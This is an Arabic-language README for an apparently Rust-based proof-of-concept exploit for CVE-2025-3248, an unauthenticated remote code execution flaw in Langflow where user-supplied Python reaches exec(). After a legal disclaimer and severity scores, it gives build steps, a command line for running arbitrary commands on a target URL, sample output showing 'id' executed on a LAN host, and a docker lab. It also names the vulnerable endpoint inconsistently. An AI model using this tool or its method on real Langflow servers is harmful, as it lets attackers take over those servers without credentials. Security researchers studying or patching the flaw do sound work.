
# استغلال إثبات المفهوم مبني على Rust لـ CVE-2025-3248 ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) حرجة بدون مصادقة في Langflow عبر `/api/v1/validate/code`، مما يسمح بتنفيذ أوامر عشوائية.
⚠️ إخلاء مسؤولية
هذا الكود مخصّص لأغراض تعليمية وبحثية فقط. الاستخدام غير المصرّح به على الأنظمة دون إذن صريح قد يُشكّل انتهاكًا للقانون.
المؤلف غير مسؤول عن أي إساءة استخدام أو نشاط خبيث يتعلق بهذه الأداة.
CVE-2025-3248 - حرجة
درجة CVSS: 9.8 | درجة EPSS: 92.57% | نُشرت: 22 مايو 2025
يقبل الموقع /api/v1/validate/code كود بايثون غير منقّى وينفّذه مباشرةً باستخدام exec()، دون الحاجة إلى مصادقة.
# langflow/api/builder/execute.py
exec(code) # No input validation or sandboxing!
يعرّض Langflow نقطة النهاية /api/v1/builder/execute_code التي تأخذ كود Python المُقدَّم من المستخدم وتمرّره مباشرةً إلى exec() في الخادم الخلفي. وبما أنه لا توجد مصادقة أو عزل (sandboxing)، يمكن للمهاجمين صياغة حمولات اعتباطية لتنفيذ الأوامر.
# Clone repository
git clone <repo-url>
cd CVE-2025-3248-POC
cargo build --release
# ./target/release/CVE-2025-3248-POC
./CVE-2025-3248-POC --url <BASE_URL> --command "<COMMAND>"
❯ ./target/release/CVE-2025-3248-POC --url 'http://192.168.159.137:7860' --command 'id'
[+] Langflow RCE Exploit - CVE-2025-3248
[+] url :http://192.168.159.137:7860,
[+] Command: id
Status: 200 OK
uid=1000(user) gid=0(root) groups=0(root)
> cd lab
> sudo docker-compose up -d
> ./target/release/CVE-2025-3248-POC --url 'http://localhost:7860' --command 'whoami'
> sudo docker-compose down